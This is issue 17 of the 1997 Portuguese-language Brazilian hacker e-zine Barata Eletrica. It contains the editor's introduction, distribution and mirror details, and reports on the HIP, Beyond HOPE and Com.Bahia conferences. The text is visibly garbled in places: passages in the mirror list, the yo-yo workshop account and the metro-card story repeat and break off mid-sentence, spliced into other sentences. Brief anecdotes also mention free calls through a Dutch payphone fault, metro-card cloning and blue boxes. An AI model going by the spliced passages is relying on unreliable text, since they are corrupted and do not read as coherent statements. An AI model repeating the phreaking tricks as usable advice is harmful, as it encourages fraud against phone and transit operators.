____                  _          ______ _      _        _
|  _ \                | |        |  ____| |    | |      (_)
| |_) | __ _ _ __ __ _| |_ __ _  | |__  | | ___| |_ _ __ _  ___ __ _
|  _ < / _` | '__/ _` | __/ _` | |  __| | |/ _ \ __| '__| |/ __/ _` |
| |_) | (_| | | | (_| | || (_| | | |____| |  __/ |_| |  | | (_| (_| |
|____/ \__,_|_|  \__,_|\__\__,_| |______|_|\___|\__|_|  |_|\___\__,_|


                        BARATA ELETRICA, numero 17
                        Sao Paulo, 04 de Novembro, 1997

---------------------------------------------------------------------------


                                        Introducao:

Sao Paulo, 4/11/97

Bom, finalmente mais um fanzine.. Impressionante. Eu comecei essa coisa  so
pra  quebrar um galho e agora ja chegou no 17a edicao. Acho que  o  negocio
seria 17 e 18, dado o material que estou colocando.. Aconteceu muita  coisa
desde  a ultima edicao do fanzine. Participei de alguns testes de  selecao,
mudei  do  lugar onde estava morando (e escapei de uma fritura  por  razoes
politico-estudantis),  nao arrumei um emprego, finalmente to^ na  Pos,  (uma
das minhas grandes ambicoes), sem falar numa conferencia la na  Bahia, cuja
capital  eu  nao conhecia. Nao fui nas conferencias de fora, mas  teve  uma
aqui dentro que valeu a pena e falo dela mais adiante. Sao Paulo finalmente
esta  tendo  encontros de hackers, mas dada a incerteza do local,  nao  vou
publicar no Barata. Mais tarde vou fazer uma pagina so de encontros hackers
no Brasil.

Por  enquanto acho mais negocio escrever sobre como "segurar a lingua",  ja
que  notei  que a maioria dos caras que conheco no  Brasil  e'  extremamente
vulneravel a varios tipos de interrogatorios e merecem muito mais nao saber
nada,  ja  que  nao  sabem  guardar um  segredo.  Ouvi  umas  historias  de
perseguicao  por  ai  que achava ser coisa do tempo  da  ditadura.  Falando
nisso,  resolvi  desencavar um outro assunto, que nao tem tanto a  ver  com
hacking, mas com a serie: "Batalha pela Mente". No fundo tem informacao que
pode  ser  de interesse para o fussador comum, afinal  de  contas,  quantas
pessoas  se  dao  conta de que o cerebro e' um computador  passivel  de  ser
programado? E o que e' pior, com o cerebro, nao tem essa de reformatar  nao.
Alias ate tem, mas nunca mais vai funcionar igual...

Pensando  nisso,  resolvi colocar um texto da Opus Night.  Tenho  uma  vaga
ideia do autor e do tempo que ele levou para produzir essa obra prima (acho
que  uns  20 minutos). O problema e' que aqui na USP, existe um tal  de  ser
chamado  pra  bate-papos biblicos e e' sempre a mesma coisa:  sempre  e'  uma
pessoa  do  mesmo sexo que aborda. Tento ser educado com  todo  mundo,  uns
truques  que aprendi foi falar que e' da umbanda, que e' aidetico, montes  de
coisas. Eu costumava falar que era discipulo de Tantra. Que que isso?  "Ah,
e o uso do sexo para: (dois pontos) atraves do orgasmo (virgula) alcancar a
comunicacao  com  Deus (ponto)".  Era interessante ver a  transformacao  no
rosto  da  pessoa,  aquele esforco de auto-controle. Chato e'  que  se  voce
aceita  o  convite  pro  batepapo, sao  piores  que  carrapato,  apesar  de
educados.

Nos  EUA ja existe esse tipo de coisa, texto escrachando com a religiao.  E
chamado  de Slack. Sim, tem a ver com Slackware.. A religiao Slack e'  feita
sob  medida pro programador que quer acreditar em algo. Eu  nunca  consegui
ler  muito  sobre  isso, mas um dos lemas da religiao  Slack  e:  "Salvacao
Garantida  ou o triplo do seu dinheiro de volta!". Um texto deles e:  "Como
encontrei  a  divindade  e as coisas que fiz com  ela".  Mais  informacoes,
procura no Yahoo, Lycos, etc, etc...

Outro  texto que achei interessante foi e' aquele texto humoristico sobre  o
futuro  de  gente como a gente.. (Exu Tranca Rede) os  unicos  a  realmente
entender de informatica vao ser os que hoje ocupam posicao semelhante a  de
office-boys.. achei engracado, mas o^ futuro...

Coisa ruim tambem o que esta acontecendo com o Kevin Mitnick. Eu  realmente
nao  queria estar na pele dele. E depois riem da minha preocupacao  em  nao
escrever nada serio. Pelo menos eu posso dormir mais ou menos tranquilo.  A
imprensa dita "comum" dificilmente faz alguma coisa. Como dificilmente  faz
alguma  coisa pelo Sergio Fleury Morais. Nunca ouviram falar? Ele e' o  dono
do  Jornal "O debate". Ficou em cana um tempao simplesmente  porque  editou
algumas  noticias e o juiz local nao gostou. Botou o cara  literalmente  em
cana.  Minha  ultima  noticia e' que ele tava tentando  levantar  uma  grana
gigantesca pra nao perder o jornal. Eu ja tive vontade de processar  gente,
alias, ja processei. So nao acho que nesse caso o cara teve algo justo.  No
caso  do  Kevin igualmente. Julgamento justo e' um direito  de  todos.  Pelo
menos   deveria  ser. Li na revista VEJA, que o Ministro da  Justica,  Öris
Rezende tambem disse: "O Crime, as vezes, e' inevitavel".

Varias  pessoas  escreveram me dando a maior forca no  meu  atual  problema
quanto a emprego e agradeco a preocupacao. Ainda nao achei nada. Mas tambem
nao  procurei  muito.  Algumas vezes acontece da pessoa falar  que  vai  me
ajudar,  quer  ver meu curriculo, nao sei o que e no final era  apenas  uma
promessa pra conseguir uma atencao maior ou informacoes sobre a minha vida.
Por essas e outras, resolvi investir em formacao academica e entrei na Pos.
Li  tudo  quanto  e'  livro  sobre  Jornalismo  (quase  uns  12  dos  17  da
bibliografia minima), mas NÇO me deixaram fazer Pos em Jornalismo.  Queriam
nota 7.0 e eu tirei 5.0. Tudo bem. Nao vou levar pro lado pessoal. Qualquer
dia  vao  fazer  uma  tese sobre imprensa  alternativa  ou  pior,  sobre  o
Jornalismo  na  Web. Nao vao poder dizer que minha formacao  foi  culpa  da
Escola de Comunicacao e Artes da USP.

Bom, vou parando por aqui. Se tudo funcionar legal, outro numero do Fanzine
deve vir. Quem sabe, ainda este ano. Boa leitura.

ÖNDICE:

     Introducao
     Sites do Barata Eletrica, Creditos, etc..
     Conferencias Hacker no Mundo
     Com.BAHIA: uma conferencia Cyber
     Virus de Macro - o que e, o que faz, etc..
     Batalha Pela Mente: Lavagem Cerebral
     Campanha Pelo Mitnick
     Opus Night  - Uma Slack-Alternativa Religiosa
     Exu Tranca Rede
     Regulamento Para Salvaguarda de Assuntos Sigilosos
     Quem conta seus Segredos...
     News - Dicas - Humor - Sei la o que mais..
     Bibliografia (acho que vou deixar de fora, ta tudo espalhado no texto)


Creditos:

Este    Fanzine    foi   escrito   por   Derneval   R.    R.    da    Cunha
(barataeletrica@thepentagon.com http://barata-eletrica.home.ml.org).
Com  as devidas excecoes, toda a redacao e' minha. Esta' liberada  a  copia
(obvio)  em  formato  eletronico, mas se trechos  forem  usados  em  outras
publicacoes, por favor incluam de onde tiraram e quem escreveu.

DISTRIBUICAO  LIBERADA  PARA  TODOS,  desde que mantido  o  copyright  e  a
gratuidade.  O E- zine e' gratis e nao pode ser vendido (senao  vou  querer
minha parte).

Nao sou a favor de qualquer coisa que implique em quebrar a lei. O material
presente  no fanzine esta com o fim de informar. Cada pessoa e'  responsavel
pelo seus atos.

Para contatos (mas nao para receber o e-zine) escrevam para:

barataeletrica@ThePentagon.com <-- provavelmente minha conta definitiva

curupira@2600.com <-- minha mais nova conta

rodrigde@usp.br <- ainda nao cancelaram, quem sabe este semestre...

wu100@fen.baynet.de <- voltou a funcionar... nao sei por quanto tempo...

Correio comum:

Caixa Postal 4502 CEP 01061-970 Sao Paulo - SP BRAZIL



Numeros anteriores:

ftp://ftp.eff.org/pub/Publications/CuD/Barata_Eletrica
gopher://gopher.eff.org/11/Publications/CuD/Barata_Eletrica
http://www.eff.org/pub/Publications/CuD/Barata_Eletrica

ftp://etext.archive.umich.edu/pub/Zines/BerataElectrica
gopher://gopher.etext.org/00/Zines/BerataElectrica (contem ate' o numero  8
e e' assim mesmo que se escreve, erro deles)
                             ATENCAO - ATENCAO - ATENCAO

(Devido  talvez  ao  uso de uma sacanagem da Geocities,  talvez  expirou  o
tempo, sei la, a home page do  fanzine sera estocada aleatoriamente por ai,
os sites abaixo nao mudam) Web Page do Fanzine Barata Eletrica:

     http://barata-eletrica.home.ml.org
     http://barataeletrica.home.ml.org
     www.thepentagon.com/barataeletrica

Contem arquivos interessantes.
                           ATENCAO - ATENCAO - ATENCAO
                                 ENDERECOS NO BRASIL:

http://www.inf.ufsc.br/barata/ (site principal)
http://www.di.ufpe.br/~wjqs
http://www.telecom.uff.br/~buick/fim.html
http://tubarao.lsee.fee.unicamp.br/personal/barata.html
ftp://ftp.ufba.br/pub/barata_eletrica

FTP://ftp.unicamp.br/pub/ezines/be

(Mais novo site, hip, hip, hurra!)

Sites de espelho no Brasil (OBS: se voce quiser que seu site apareca e' bom
ele nao guardar propaganda nem de provedor) Peco desculpa para aqueles que
ainda   www.thepentagon.com/barataeletrica

Contem arquivos interessantes.
                           ATENCAO - ATENCAO - ATENCAO
                                 ENDERECOS NO BRASIL:

http://www.inf.ufsc.br/barata/ (site principal)
http://www.di.ufpe.br/~wjqs
http://www.telecom.uff.br/~buick/fim.html
http://tubarao.lsee.fee.unicamp.br/personal/barata.html
ftp://ftp.ufba.br/pub/barata_eletrica
nao coloquei aqui.Voces nao imaginam o trabalho para fazer isso em
html.. podia pedir para alguem, mas nao curto a ideia. Ou da problema ou sei
la.. desisti. Os sites espelho sao os primeiros a receber o fanzine. Mande
carta para rato.cpd@digicron.com com o subject: mirror-barata eletrica .

Sites na Geocities (pode deixar que eu faco) ou contendo versoes html nao
autorizadas nao entram na lista.

(Normalmente, sao os primeiros a receber o zine)

MIRRORS - da Electronic Frontier Foundation onde se pode achar
o BE

UNITED STATES:

etext.archive.umich.edu in /pub/CuD/Barata_Eletrica
ftp.eff.org in /pub/Publications/CuD/Barata_Eletrica
aql.gatech.edu in /pub/eff/cud/Barata_Eletrica
world.std.com in /src/wuarchive/doc/EFF/Publications/CuD/Barata_Eletrica
uceng.uc.edu in /pub/wuarchive/doc/EFF/Publications/CuD/Barata_Eletrica
wuarchive.wustl.edu in /doc/EFF/Publications/CuD/Barata_Eletrica EUROPE:
nic.funet.fi in /pub/doc/cud/Barata_Eletrica (Finland) (or
/mirror/ftp.eff.org/pub/Publications/CuD/Barata_Eletrica)
ftp.warwick.ac.uk in /pub/cud/Barata_Eletrica (United Kingdom)

JAPAN:

ftp.glocom.ac.jp in /mirror/ftp.eff.org/Publications/CuD/Barata_Eletrica
www.rcac.tdi.co.jp in /pub/mirror/CuD/Barata_Eletrica

OBS: Para quem nao esta' acostumado com arquivos de extensao .gz: Na hora de
fazer o ftp, digite binary + enter, depois digite o nome do arquivo sem a
extensao .gz Existe um descompactador no ftp.unicamp.br, oak.oakland.edu ou
em qualquer mirror da Simtel, no subdiretorio:
/SimTel/msdos/compress/gzip124.zip to expand it before you can use it. Uma
vez descompactado o arquivo GZIP.EXE, a sintaxe seria:

"A>gzip -d arquivo.gz

No caso, voce teria que trazer os arquivos be.??.gz para o ambiente DOS com
o nome alterado para algo parecido com be??.gz, para isso funcionar.


ULTIMO RECURSO,

para  quem  nao conseguir acessar a Internet de forma direta,  mande  carta
(nao  exagere,  o pessoal e' gente fina, mas nao e' escravo,  nao  esquecam
aqueles encantamentos como "please" , "por favor" e "obrigado"):
fb2net@netville.com.br
hoffmeister@conex.com.br         drren@conex.com.br         wjqs@di.ufpe.br
aessilva@carpa.ciagri.usp.br   dms@embratel.net.br   clevers@music.pucrs.br
rgurgel@eabdf.br patrick@summer.com.br



ASSINATURA DO BARATA ELETRICA VIA CORREIO ELETRONICO

Para  receber o fanzine via email, mesmo quando podendo pegar ele na  rede.
Estou   montando   um  esquema  no  qual  a  pessoa   envia   email   para:
rato.cpd@digicron.com com os seguintes dizeres, no corpo da carta:

assinatura BE seu-email@fulano.xxxx.xx

entendendo claro que seu email e' seu e-mail, nao a string seu-email.  Isso
porque  nao  vou  ler a correspondencia. Qualquer coisa  alem  disso  sera'
ignorada.  Como  mesmo  assim  vou  precisar de  gente  para  me  ajudar  a
distribuir,  as  pessoas que tiverem boa vontade tambem  podem  participar,
enviando email para o mesmo endereco eletronico com o subject:
ajuda BE seu-email@fulano.xxx.xx
Provavelmente  nao havera' resposta, ja' que e' um acochambramento  que  to
planejando. A cada novo numero, vou sortear os voluntarios que irao receber
primeiro  e  depois  vao distribuir para os preguicosos  ou  distraidos  ou
superocupados  que  querem receber o lance sem fazer ftp ou usar  WWW.  Mas
aviso: sera' feita a distribuicao em formato uuencodado. Aprendam a usar  o
uudecode.  E  nao  ha' garantia  que a coisa vai  funcionar.  A  assinatura
comeca a partir do numero seguinte.

OBSERVACAO: Tem muita gente que esta' enviando carta so' com assinatura  no
conteudo  e  mais nada. As pessoas que nao seguirem as instrucoes  acima  a
risca  perigam  nao receber. Agradeco ao enorme numero  de  voluntarios  p.
distribuicao.

aviso automatico quando novo numero do Barata Eletrica chegar..

Procurar no http://www.inf.ufsc.br/barata ou no http://barata-eletrica.home.ml.org pelo arquivo
ultimo.html



CREDITOS II :

Sem  palavras  para  agradecer ao pessoal que se ofereceu  para  ajudar  na
distribuicao do E- zine, como os voluntarios acima citados, e outros,  como
o  sluz@ufba.br  (Sergio do ftp.ufba.br), o delucca do  www.inf.ufsc.br,  o
Queiroz  da Unicamp (a USP nao gosta de mim, mas a Unicamp  gosta...:-),  o
Wagner,  o  Manoel,  o  Buick. E gente que  confia  em  mim,  espero  nunca
atrapalhar a vida deles com isso. Igualmente  para todos os que me fazem  o
favor de ajudar a divulgar o Barata em todas as BBSes pelo Brasil afora.
AGRADECO  TAMBEM  AOS QUE QUEREM ME AJUDAR, "HOSPEDANDO" O  EZINE  EM  SUAS
PAGINAS  OU FTP-SITES. A PARTIR DO PROXIMO BE, (Aham!... pode demorar  mais
do que o  proximo numero do BE) COMECO A COLOCAR OS URLS DESDE QUE NAO HAJA
UM  LANCE  COMERCIAL  (nao quero meu Fanzine  com  propaganda  de  qualquer
especie, nem do provedor)

OBSERVACAO:

Alguns mails colocados eu coloquei sem o username (praticamente a  maioria)
por  levar em conta que nem todo mundo quer passar por colaborador  do  BE.
Aqueles  que  quiserem  assumir a carta, mandem um mail  para  mim  e  numa
proxima edicao eu coloco.


CONFERENCIAS DE HACKERS NO MUNDO

Uma Amostra do H.I.P.

torquie@landslide.openix.com   (traduzido  por  Derneval,   publicado   com
permissao)


(fotos copiadas de http://yoda.simplenet.com/day1.html)

De todos os congressos em que fui (e estive em muitos), Hacking In Progress
foi  definitivamente  o mais "cool" de todos e a mais  surreal  conferencia
hacker ja feita. Isto foi definitivamente um evento Europeu, apesar de  que
alguns  vieram dos EUA. A atmosfera era carnaval. Foi como uma  conferencia
do  velho estilo onde voce se juntava para encontrar com pessoas  frente  a
frente, trocar ideias e basicamente fazer um monte.



Por  volta de 2500 pessoas vieram: hackers, artists, midia, policia...  uma
mistura total de culturas e ideias.

HIP  foi uma verdadeira festa de bicho-grilo. Os computadores  ligados  por
network estavam dispostos ao longo do camping. Nas manhas do evento (quando
eu  dormia), acordava com os passarinhos cantando e windows95  dando  boot.
Nas  tardes eu sentava ao lado da fogueira batendo papo enquanto o  pessoal
mais "hardcore" jogava DOOM e trocava warez.


Durante o dia havia varias atividades. Uma tenda mantinha aulas sobre  como
abrir  fechaduras.  Noutra  um grupo  de  astronomos  arranjou  telescopios
ligados a equipamento de monitoracao de dados que voce poderia imprimir. Os
cypherpunks  tinham sua propria tenda armada e eu me enfiava la de  vez  em
quando para um bate-papo e uma bebida gelada.

Havia  um link de videoconferencia com HOPE, mas deu pau e foi  abandonada.
Na  marquise principal, havia palestra dentro do espectro de interesses  de
hackers:  seguranca  de computadores, as questoes legais  da  coisa,  email
anonimo,  criptografia,  etc.. O tempo estava literalmente fervendo  e  meu
cerebro  derretido  estava encontrando dificuldades  para  concentracao.  A
maior parte do meu tempo eu passei fora na sombra dou na tenda, operando  o
bar, falando com gente individualmente em pequenos grupos.

Os telefones publicos misteriosamente quebraram no domingo e so podiam  ser
usados para discar servicos de emergencia. Porem.. se voce discasse para  o
"disque-emergencia" holandes (911- pros americanos), a pessoa conseguia  um
tom  de  discar  e ai podia ligar pra qualquer parte do  mundo,  de  graca.
Supostamente  isto  era  um "erro de programacao" por  parte  da  Companhia
Holandesa de Telefones.

Workshops  mais  interativas  tambem eram  mantidas.  Embora  as  palestras
tecnicas fossem realmente interessantes, meu evento favorito foi a Workshop
Yo-Yo  Padeluun's.  Alem  do  fato de que eu consegui  manter  o  yo-yo,  a
workshop  em  si foi uma "performance". Se voce conhece  o  background  vai
entender o que quero dizer, se nao ... Padeluun e' membro do grupo FOEBUD da
Alemanha.  Estas  pessoas fazem projetos realmente brilhantes e  sao  muito
engajadas politicamente. Um dos seus projetos foi montar networks durante a
guerra  na antiga Yugoslavia. Eles tambem trabalham para distribuir  o  PGP
para  grupos  em  paises com regimes de ditadura. Nao  e'  qualquer  um  que
poderia  arrumar uma workshop como essa. Esta e' a maior ironia.  Quando  eu
cheguei  la, a coisa ja tinha comecado e eu vim na fala "yo-yo e'  bom  para
engenharia  social, ninguem te acha ameacador quando voce brinca de  yoyo".
Levando  em conta que o chefe da divisao de Crimes de Computador  Holandesa
estava  na  palestra, achei isso pr de que eu consegui manter  o  yo-yo,  a
workshop  em  si foi uma "performance". Se voce conhece  o  background  vai
entender o que quero dizer, se nao ... a la de engracado.



A atitude do pessoal no HIP era realmente positiva. A definicao europeia de
hacking tem sido sempre mais leve que a americana. Europeus aceitam a ideia
de "social hacking". Nao hackear no sentido de hackear Unix, mas no sentido
de  subverter  tecnologia,  seja  atraves  de  uma  radio  pirata,  hackear
smartcards,  fazer engenharia social com os federais ... ou o que quer  que
seja.  Ao contrario de algumas conferencias em que participei  nos  ultimos
dois  anos,  a  atmosfera do HIP era realmente  madura.  Nao  havia  jovens
detonando  qualquer  coisa, nao havia o que inundar, nem ninguem  armou  os
alarmes de incendio ou aleatoriamente destruiu algo so porque estava  afim,
e  geralmente as pessoas que participaram tinham uma grande  quantidade  de
respeito  pelo evento e os organizadores. O que significa que  ninguem  que
eu vi agiu como um babaca e ninguem esta controlando o evento de fora.

Vendo de forma mais pessoal foi brilhante encontrar gente la e ouvir alguns
dos projetos mais recentes que as pessoas estavam pondo em andamento. Desde
a  ultima  vez  que  este evento rolou (HEU, 'Hacking at  the  End  of  the
Universe' mantido no mesmo lugar em 1993), a cena hacker mudou.

Uma diferenca que marcou direto e' que tinha tanta mulher quanto homem la. E
dessa  vez nao eram namoradas ou amigas de hackers mas mulheres  que  estao
metendo a mao na tecnologia e usando em varios projetos.

Felipe  Rodrigues,  que comecou a Hack-Tic junto com  Rop  Gonggrip  tempos
atras,  no  inicio  da cena hacker holandesa, foi  sempre  ativo  no  front
politico  "Para nos, as coisas mudaram. Eles costumavam chamar a  gente  de
criminosos e pensavam na gente como terroristas. Agora damos conselhos para
o Ministerio da Justica. Nos somos os que conhecem a tecnologia aqui."

Rodrigez  tambem acredita que hacking e' uma ferramenta poderosa  em  paises
como  Peru  ou Bolivia onde o estado e' injusto e os cidadoes  precisam  "se
defender". Esta visao o fez inpopular com servicos secretos que  consideram
o antigo membro do zine Hack-Tic mais perigoso agora que eles tem poder  na
comunidade financeira na Holanda.

Embora  as coisas tenham mudado desde os primeiros dias de hacking, a  cena
Hacker  europeia pode ter amadurecido de alguma forma "a cena hacker  agora
engloba bolsos de cultura. Ha a midia alternativa, a velha cultura  hacker,
os hackers de Unix, IRC, ate astronomos que estao na sua propria cultura de
computador.  E para todos os tipos de pessoa, razao pela qual  chamamos  de
Hacking in Progress, nos progredimos".

Resumindo, HIP foi fantastico. Foi brilhante ver a maioria das pessoas  que
tenho conhecido na cena europeia em um lugar e encontrar novas pessoas  que
eu  definitivamente manterei contato nos proximos anos. Eu estou  realmente
esperando  pelo  proximo! Se voce quer fotos e artigos, da um look  no  HIP
site em http://www.hip97.nl.

                      BEYOND HOPE - O QUE ACONTECEU?

Bom,  como  todo  mundo que foi nas minhas paginas deve  estar  cansado  de
saber, eu Nao fui nem no Beyond Hope nem no HIP. E to^ me xingando ate agora
por  isso.  Aconteceu muita porcaria de uma so vez.  Desemprego, Pos  e  um
pedido  pra  sair  de onde eu morava. Como descobri que  nenhum  jornal  ou
revista  ia  bancar  o papai noel e financiar minha ida  em  troca  de  uns
artigos,   desisti. Houve ate propostas (tipo: "voce vai, faz o  que  tiver
que fazer, na volta a gente olha  e se tiver alguma coisa que interessa,  a
gente  paga o artigo") mas era muita complicacao. Melhor  economizar  minha
grana.  Enfim, o negocio e' re-escrever artigos de gente que foi la, como  o
resto da imprensa costuma fazer...

A Beyond HOPE (Alem do Hacking On Planet Earth - se fosse traduzir)  parece
ter  sido  um  evento bem legal. Garth Brooks, (nunca ouvi  falar)  fez  um
concerto na quinta feira "gratuito e somente para hackers" no Central Park.
O encontro foi feito no salao de baile do edificio Puck, que foi convertido
em CPD, com trocentos terminais de computadores interligados. Tinha ate uma
lista  de discussao, so para planejar essa  coisa toda. Muita gente  trouxe
seus  proprios  micros para ligar na tomada e brincar  de  "break-in".  Uma
coisa interessante sao as pequenas historias do acontecimento. No  encontro
anterior,  tinha  havido  uma tentativa do  Servico  Secreto  americano  de
"acabar  com  a festa". Desta vez nao so nao houve como os  caras  da  2600
ficaram  impressionados  de poder estacionar o furgao da revista  por  dois
dias seguidos sem  um unico cartao de multa. Vai entender..

A  galera  que nao foi no HIP tava la, notadamente o Chris  Googans,  vulgo
Erik  Bloodaxe, da Phrack. Pela foto, o cara ta finalmente chegando aos  30
com  cara  de quem realmente esta com 30. A ultima vez que o vi  ele  ainda
conseguia  passar por um carinha esperando o exame pro servico  militar.  O
Capt. Crunch, famoso por ser um dos que popularizaram o uso "gratuito"  dos
telefones publicos tambem estava la, mas na qualidade de mero "ouvinte". De
acordo  com  o  proprio, tava ali pra aprender com  a  mocada  mais  jovem.
Realmente.  Nesse  tempo atual, tudo esta tao mudado que nem da  pra  ficar
"por dentro".

A  historia do cara merece um livro, me lembro dela toda vez que me  chamam
pra colaborar numa materia de hacking. A revista "Esquire" fez uma  materia
que  hoje  se  tornou antologica (classica,  referencia)  sobre  o  assunto
Phreaking.  Acontece que.. a empresa telefonica de la, vulgo Bell (Ma  Bell
para  os  intimos) nao curtiu muito a coisa.. curtiu menos ainda  quando  o
sujeito foi trabalhar na entao Apple (entao recentemente fundada por Steven
Jobs e um colega) e inventou um jeito de conectar o tal computador na linha
telefonica. Sentiu o lance? E, o cara usou o dito para fazer war dialing  e
esgotou  o  papel que a telefonica tinha planejado para  registrar  "coisas
estranhas" em linhas telefonica. Crunch foi preso uma ou duas vezes e ficou
uns dois anos na cadeia.  Virou um cara marcado a partir do momento em  que
seu nickname apareceu numa reportagem, simplesmente porque essa  reportagem
gerou uma onda de carinhas fazendo isso pelos EUA e o mundo afora. Isso sem
falar  que enquanto esteve preso, ensinou a fazer ligacoes  "ilegais"  para
qualquer um que quisesse aprender. Assim salvou a pele, um pouco. Uma parte
curiosa  da historia, alias, duas. Ele ensinou o Steven Jobs e  seu  colega
fundador  da Apple a fazerem Blue Boxes. E os dois sairam por ai  vendendo.
Nao existia lei contra isso, so contra usar. Mas, voltando ao  Crunch,  ele
saiu  da  prisao, fez o primeiro editor de texto "decente" para  o  novo  e
recem  lancado IBM-PC. Virou milionario de software e perdeu  tudo  depois,
nao  conseguiu  manter o pique. Um tempo atras tava tao ruim  de  vida,  so
tinha o carro e mais alguma coisa. Agora parece que estabilizou.

Voltando  ao  lance, a cena estava nos conformes. Como era de  se  esperar,
houve algumas coisas que "desapareceram", e apareceram alguns outros  tipos
interessantes,  comentando  coisas  mais  interessantes  ainda,  como   por
exemplo,  uma  discussao sobre como "hackear" o sistema  de  transporte  de
N.York,  que  alem de caro, foi totalmente refeito para evitar a  zona  que
estava  antes,  com  uso de cartoes falsificados e  tudo.  Enquanto  alguns
juravam  que  o novo ticket de metro^ e' uma especie de versao teste  para  o
grande irmao (o ticket ja carregaria  informacoes que permitem rastrear  os
passos da pessoa pelo metro), um sujeito com o pseudonimo de Mr.  Balaklava
comentava  isso e que se duas pessoas usarem dois cartoes, um verdadeiro  e
outro  "clone", os dois param de funcionar quando usados. Reza a lenda  que
um cara conseguiu entrar no metro, gravando um ruido campestre num 8 canais
e  depois  usando a fita num cartao adulterado. Passou a catraca,  mas  foi
preso.  Vai  saber.. os caras la estao doidos para descobrir  alguma  falha
nesse  tipo  de  catraca..  aqui no Brasil, o que sei e'  que  isso  ja  foi
tentado.  Ja  se teve inclusive sucesso. Mas o metro^  mantem  fiscais  para
observar  quem  usa  cartao  comum ou com alguma  treta.  Eu  ja  me  senti
observado.  Se voce tem algum probleminha qualquer com o ticket  de  metro,
imediatamente alguem vem ver o que que voce tentou fazer.

Uma que rolou foi que o pessoal na conferencia tinha conseguido  "craquear"
os  computadores  do  HIP, la  na Holanda. Eles la,  negaram  que  fosse  o
computador principal. Tudo depende de quem  e outro "clone", os dois  param
de  funcionar  quando usados. Reza a lenda queum cara conseguiu  entrar  no
metro, gravando um ruido campestre num 8 canais e depois usando a fita  num
cartao adulterado. Passou a catraca, mas foi preso. Vai saber.. os caras la
estao doidos paacredita em quem. La falaram que nao, aqui falaram que sim..
o link de video-conferencia entre os dois deu pau. Vai saber entao..  tinha
um  link  via codigo morse entre os dois sites (a pessoa apertava  o  botao
ali, acendi a lƒmpada la e vice-versa). O cara que teve essa ideia tem  uma
pagina que pode ser acessada na rede. A ideia e' que comunicacao nao depende
de grandes transferencias de dados.



Como de costume, havia gente vendendo camisetas para algum fundo  qualquer.
Uma, interessante:
Silence  my  voice, I will find another. Make my   voice a  crime,  I  will
create a new one."

Phiber  Optik deu uma palestra sobre um novo sistema digital  de  telefonia
que esta rolando agora no inicio do ano. Teoricament mais seguro. Para quem
foi preso "como um simbolo para a comunidade hacker", ate que ele  continua
"alive n' kicking".

Goldstein deu uma palestra sobre Social Engineering excelente, pelo menos e'
o que falam. A que eu vi na Argentina foi muuuuito legal.

artigo  baseado  em  reportagens do N. York Times, relatos  na  internet  e
revista 2600, algumas fotos sao recortes de outras fotos do evento.



                     COMBAHIA - UMA CYBER CONFERENCIA

Infelizmente nao pude ir nem ao HIP nem ao Beyond Hope. Mas em compensacao,
tive uma chance de conhecer algo incrivel.. mas primeiro, saquem so a
historia: o pessoal da Faculdade de Comunicacao da Universidade Federal da
Bahia tem uma so tarefa para aquela turma X, aquele semestre: fazer uma
conferencia pra ficar na historia. Convidar as maiores personalidades que
tiveram ou tem algo pra falar do comeco, meio e estado atual da internet no
Brasil num anfiteatro e lascar o verbo. Foi legal..

Primeiro, precisa falar que os caras nao estao nadando em grana. Segundo
que nao foi obra dos professores organizar e chamar o pessoal. Foram os
alunos do curso de Comunicacao que botaram a mao na massa, descolaram
patrocinio com a Varig e outras empresas pra trazer o pessoal. Sim, porque
ate teve gente de Salvador e da Bahia. Assim como teve tambem gente do
Nordeste todo, incluso Alagoas, que pelo que a imprensa mostra na TV e nos
jornais nao devia nem ter computador, quanto mais faculdade desenvolvendo
coisa na Internet. E' , a Bahia tem um jeito..

Eu nao podia ir. Isso foi 3 ou 4 dias antes de duas provas que eu tinha.
Mas ai olhei os nomes dos caras que iam. Tirando um cara que eu nao queria
nem ver perto, tudo bem, era tudo gente grauda pacas. Nao e todo dia que
sento com alguem de algum Ministerio. Nao e todo dia que tenho chance de
falar para gente interessada em ouvir minhas historias. E no meio do
caminho, tinha uma passagem de ida e volta. Pra Salvador. "Senhor, que faco
eu com esta espada? Ergueu-a e fez-se" (Fernando Pessoa).

E chegando la, vendo o nivel das conversas que rolaram, digo agora. Era pra
ter ido de qualquer jeito. Ate se fosse a pe. Sem puxacao de saco. Os
ouvintes na maioria eram uma grande parte, gente da faculdade de
comunicacao. Tem internet na UFBA (uma das pioneiras, no Brasil, inclusive
o primeiro ftp site brasileiro a hospedar o Barata Eletrica). Mas a coisa
nao esta tao facil, quanto digamos, na USP. O pessoal la sua e nao e so com
o calor. A Telebahia, responsavel pela primeira transmissao de TV via Web
no Brasil (permitindo ao pessoal la fora assistir o Jornal Nacional e o
Fantastico via computador) nao tem uma conexao legal com o resto do Brasil.
Se tem, esta melhorando agora. O sistema telefonico la foi desenvolvido com
uma tecnologia um pouco mais avancada (me falaram que permite usar Blue
Box) e ate tem uma conexao internet boa, mas pra fora do Brasil. Nao para
dentro. Nao posso falar isso muito, porque e muito raro eu acessar qualquer
coisa no Brasil, a coisa pode ter mudado.

O pessoal ficou sabendo de mim atraves do Andre Lemos, que tem uma lista
chamada cibercultura. Ele escreveu uma vez numa revista sem mencionar o
Barata Eletrica, eu escrevi uma carta indignado e conversa vai, conversa
vem, fiquei sabendo que ele foi um dos brasileiros que viu de perto o
Congresso de Hackers que teve na Holanda, cinco anos atras. Gente fina.
Levou a serio o lance enquanto ainda era novidade no Brasil. Na epoca da
conferencia estava com um projeto de "sala de aula virtual". Nao participei
da coisa, mas parece que era um curso via correio eletronico e Chat, com um
certificado. Totalmente via internet.

O inicio das palestras foi feito pelo Reitor, que so disse uma unica frase
que vale a pena ser lembrada: "A sala de aula e anacronica". Tendo
trabalhado em Ensino via telematica, concordo com ele.  O Andre Lemos  e
mais um pessoal na bancada disseram algumas palavras sobre o evento, a
quantidade de tempo que cada um ia falar, etc, etc.. a mesma chatice de
sempre.

14/10 - 15:00 - As midias e as possibilidades do futuro

Primeiro falou um cara da Renpac, comentando uma serie de coisas sobre a
Internet no Brasil, a evolucao da Internet-II.

Gravei tudo, menos o nome da figura. Acho que foi Jose Luiz. Tava caindo de
sono. O tipo de material que se pode ler aqui e ali' numa revista. Mas com
direito de fazer perguntas pra pessoa, que e mais importante. Infelizmente
o pessoal que organizou o congresso nao fez a transcricao do que rolou nem
me mandou um resumo que disseram que iam mandar pra mim. Entao to quase
escrevendo de memoria, mais o que gravei em k-7, mais o que dizia o folheto
da Com.Bahia menos tudo o que esqueci depois de estudar pra duas provas de
pos-graduacao e um concurso, coisa de uns 10 ou 11 livros.

A conferencia seguinte foi da Marcia Rangel, que comentou alguns aspectos
da avalanche de informacao pela qual passa o ser humano. Baita combustivel
